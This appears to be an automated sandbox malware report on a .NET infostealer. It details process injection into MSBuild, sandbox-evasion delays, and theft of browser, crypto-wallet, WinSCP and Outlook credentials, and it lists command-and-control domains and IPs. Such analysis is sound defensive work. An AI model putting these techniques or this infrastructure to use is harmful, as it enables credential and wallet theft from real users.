                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED6E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA04
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED6C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88EDAA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED0E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED784
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED384
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED424
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88EE654
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED304
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED3C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED924
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED2E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED664
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED744
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88EF3F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88EF314
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1A4
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory allocated: 780000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory allocated: 1A540000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3088Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6415Jump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exe TID: 1272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4676Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4676Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2284Thread sleep count: 3088 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2284Thread sleep count: 6415 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2284Thread sleep count: 163 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: d34e1p5zD2.exe, 00000000.00000002.2130265503.000000001B2C0000.00000004.00000020.00020000.00000000.sdmp, d34e1p5zD2.exe, 00000000.00000002.2127578766.0000000000569000.00000004.00000020.00020000.00000000.sdmp, d34e1p5zD2.exe, 00000000.00000002.2127578766.0000000000520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 00000002.00000002.4583620666.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4560301182.0000000000D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011BD1D8 LdrInitializeThunk,2_2_011BD1D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpack, ParentProcessUtil.csReference to suspicious API methods: NativeMethods.OpenProcess(PROCESS_QUERY_INFORMATION, bInheritHandle: false, (uint)id)
                  Source: 0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: KernelLoadLibrary64(GeckoResourcePath + "nss3.dll")
                  Source: 0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(NSS3, "NSS_Init")
                  Source: 0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "VirtualProtectEx")
                  Source: 0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "WriteProcessMemory")
                  Source: 0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpack, HeavensGateProcessor.csReference to suspicious API methods: NativeMethods.ReadProcessMemory(lpTargetHandle, (uint)processParameters, intPtr, (uint)Marshal.SizeOf(typeof(ulong)), ref lpNumberOfBytesRead)
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000Jump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000Jump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AA0008Jump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUIDJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeQueries volume information: C:\Users\user\Desktop\d34e1p5zD2.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC_config_file
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash_config_file
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyAaiaifbiceejhhkfbjdgonjgljkpcdhch
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC_config_file
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus_directory
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum_directory
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 0.2.d34e1p5zD2.exe.12549ac0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4558454375.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4564261555.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: d34e1p5zD2.exe PID: 7060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3116, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  133
                  System Information Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  Boot or Logon Initialization Scripts311
                  Process Injection
                  2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  111
                  Security Software Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Software Packing
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS41
                  Virtualization/Sandbox Evasion
                  Distributed Component Object Model1
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeylogging13
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  System Network Configuration Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                  Process Injection
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483414 Sample: d34e1p5zD2.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 96 26 ipinfo.io 2->26 28 investdirectinsurance.com 2->28 30 2 other IPs or domains 2->30 38 Multi AV Scanner detection for submitted file 2->38 40 .NET source code contains potential unpacker 2->40 42 .NET source code references suspicious native API functions 2->42 44 2 other signatures 2->44 9 d34e1p5zD2.exe 15 2->9         started        signatures3 process4 dnsIp5 32 investdirectinsurance.com 172.67.189.102, 443, 49721, 49722 CLOUDFLARENETUS United States 9->32 24 C:\Users\user\AppData\...\d34e1p5zD2.exe.log, CSV 9->24 dropped 46 Found many strings related to Crypto-Wallets (likely being stolen) 9->46 48 Writes to foreign memory regions 9->48 50 Allocates memory in foreign processes 9->50 52 Injects a PE file into a foreign processes 9->52 14 MSBuild.exe 15 5 9->14         started        file6 signatures7 process8 dnsIp9 34 ipinfo.io 34.117.59.81, 443, 49723 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 14->34 36 46.23.108.235, 49724, 6060 AZERONLINEAZ Azerbaijan 14->36 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->54 56 Tries to steal Mail credentials (via file / registry access) 14->56 58 Tries to harvest and steal browser information (history, passwords, etc) 14->58 60 Switches to a custom stack to bypass stack traces 14->60 18 WMIC.exe 1 14->18         started        20 conhost.exe 14->20         started        signatures10 process11 process12 22 conhost.exe 18->22         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  d34e1p5zD2.exe13%ReversingLabsWin32.Trojan.Generic
                  d34e1p5zD2.exe14%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  ipinfo.io0%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Roozpiso.bd0%Avira URL Cloudsafe
                  https://ipinfo.io/missingauth0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd#0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdE0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd#1%VirustotalBrowse
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdo0%Avira URL Cloudsafe
                  https://ipinfo.io/missingauth0%VirustotalBrowse
                  https://investdirectinsurance.com/y0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd1%VirustotalBrowse
                  https://collection.hubanalytics.io/0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/K0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Roozpiso.bd1%VirustotalBrowse
                  https://ipinfo.io/json0%Avira URL Cloudsafe
                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ipinfo.io
                  34.117.59.81
                  truetrueunknown
                  investdirectinsurance.com
                  172.67.189.102
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Roozpiso.bdfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ipinfo.io/jsontrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/missingauthMSBuild.exe, 00000002.00000002.4564261555.0000000002B64000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd#d34e1p5zD2.exe, 00000000.00000002.2127578766.000000000052C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdEd34e1p5zD2.exe, 00000000.00000002.2127578766.000000000052C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000002.00000002.4564261555.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdod34e1p5zD2.exe, 00000000.00000002.2127578766.000000000052C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/yd34e1p5zD2.exe, 00000000.00000002.2127578766.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://collection.hubanalytics.io/d34e1p5zD2.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/Kd34e1p5zD2.exe, 00000000.00000002.2127578766.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://discord.com/api/v9/users/d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4558454375.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4564261555.0000000002B64000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    34.117.59.81
                    ipinfo.ioUnited States
                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                    172.67.189.102
                    investdirectinsurance.comUnited States
                    13335CLOUDFLARENETUSfalse
                    46.23.108.235
                    unknownAzerbaijan
                    15723AZERONLINEAZfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483414
                    Start date and time:2024-07-27 11:36:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 17s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:d34e1p5zD2.exe
                    renamed because original name is a hash value
                    Original Sample Name:3992e860c4c048741356c0403e3ac9ab84094249515a98c06e255b3bb256eb68.exe
                    Detection:MAL
                    Classification:mal96.spyw.evad.winEXE@7/4@2/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 205
                    • Number of non-executed functions: 21
